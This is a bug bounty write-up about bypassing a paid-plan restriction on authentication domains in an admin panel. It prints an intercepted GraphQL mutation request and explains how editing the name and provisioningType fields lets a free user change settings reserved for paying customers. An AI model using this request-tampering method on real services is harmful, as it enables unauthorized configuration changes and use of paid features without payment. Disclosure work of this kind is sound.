Hacking the System: How I Beat Subscription Restrictions in Admin Controls

Mo2men Elmady
4 min readAug 11, 2024

--

بِسْم اللَّه الرَّحْمن الرَّحِيم . . اللَّهمَّ صَلِّ وَسلَّم وبارك على نَبِينَا مُحمَّد

Here We Are Go Again…

While Hunting with Guys in Private Bug Bounty Program

There’re ADMINISTRATION Page that containing many function like management for Usage, Data, Users, Access ,Etc…

I Found a user management interface names with Authentication Domains as you can see here is the restriction on GUI for creating Authentication Domains or renaming default name or change anything

I’ve Found to Use this interface should to subscribe in pro plan

I love challenging in this, So I Tried with diff methods to use this Functions without paying

Until I found a method to bypass this restriction

  • go to here on user management
  • then click on the user setting
  • And try to change here any value then intercept the request
  • I’ve discover that in this request that using graphql I can change in Authentication Domain
POST /graphql HTTP/2
Host: redacted.com
Cookie: xxxxxxxxxxxxx
Content-Length: 2723
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: /
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: <https://redacted.com>
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: <https://redacted.com/>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i

{"operationName":"AuthenticationDomainUpdateMutation","variables":{"includeScimConfiguration":false,"includeSamlConfiguration":false,"id":"d937a430-7593-4b86-b073-a14dcd20a229","name":"momen0x00","authenticationType":"PASSWORD","provisioningType":"MANUAL","basicFullTierChangeApproval":"ADMIN_REVIEW","coreFullTierChangeApproval":"ADMIN_REVIEW","basicCoreTierChangeApproval":"ADMIN_REVIEW","idpManagedAttributes":[],"upgradeMessage":null,"upgradeButtonText":null,"upgradeButtonTargetUrl":null,"maxBrowserSessionDuration":2592000,"maxBrowserIdleDuration":604800},"query":"mutation AuthenticationDomainUpdateMutation($id: ID!, $name: String, $currentSamlConfigurationId: String, $currentScimConfigurationId: String, $authenticationType: String, $provisioningType: String, $maxBrowserSessionDuration: Int, $maxBrowserIdleDuration: Int, $basicCoreTierChangeApproval: String, $basicFullTierChangeApproval: String, $coreFullTierChangeApproval: String, $includeScimConfiguration: Boolean = false, $includeSamlConfiguration: Boolean = false, $postUpdateActions: [PostUpdateActions], $idpManagedAttributes: [IdpManagedAttributes], $upgradeMessage: String, $upgradeButtonText: String, $upgradeButtonTargetUrl: String) {\\n updateAuthenticationDomain(\\n input: {id: $id, name: $name, currentSamlConfigurationId: $currentSamlConfigurationId, currentScimConfigurationId: $currentScimConfigurationId, authenticationType: $authenticationType, provisioningType: $provisioningType, maxBrowserSessionDuration: $maxBrowserSessionDuration, maxBrowserIdleDuration: $maxBrowserIdleDuration, basicCoreTierChangeApproval: $basicCoreTierChangeApproval, basicFullTierChangeApproval: $basicFullTierChangeApproval, coreFullTierChangeApproval: $coreFullTierChangeApproval, postUpdateActions: $postUpdateActions, idpManagedAttributes: $idpManagedAttributes, upgradeMessage: $upgradeMessage, upgradeButtonText: $upgradeButtonText, upgradeButtonTargetUrl: $upgradeButtonTargetUrl}\\n ) {\\n id\\n name\\n authenticationType\\n provisioningType\\n maxBrowserSessionDuration\\n maxBrowserIdleDuration\\n basicCoreTierChangeApproval\\n basicFullTierChangeApproval\\n coreFullTierChangeApproval\\n idpManagedAttributes\\n upgradeMessage\\n upgradeButtonText\\n upgradeButtonTargetUrl\\n currentSamlConfiguration @include(if: $includeSamlConfiguration) {\\n idpSsoTargetUrl\\n logoutRedirectUrl\\n certificate\\n certificateFilename\\n assertionConsumerUrl\\n spEntityId\\n idpEntityId\\n idpMetadata\\n __typename\\n }\\n currentScimConfiguration @include(if: $includeScimConfiguration) {\\n authenticationDomainId\\n createdAt\\n __typename\\n }\\n __typename\\n }\\n}\\n"}
  • Change this parameter:
→ "name":"DEFAULT" to "name":"BUG"
  • And i am able to change the configuration by changing this value:
→  "provisioningType":"Manual", to "provisioningType":"SCIM"

After Send Request and Navigate Again to Auth Domain interface

it Worked Finally!!

The message I waited 3>

Impact

that allows users to bypass restrictions on creating and renaming authentication domains, even if they are not subscribed to a paid plan. This exploit enables unauthorized changes to the authentication domain configuration without incurring any cost.

Conclusion:

This vulnerability allows an attacker to bypass restrictions on creating and renaming authentication domains, leading to unauthorized changes in the authentication domain configuration. This could potentially be exploited to gain higher levels of access or disrupt the normal operation of the system.

That’s all for today. I hope you all enjoyed it and learned something new

My all links Here

--

--

Responses (3)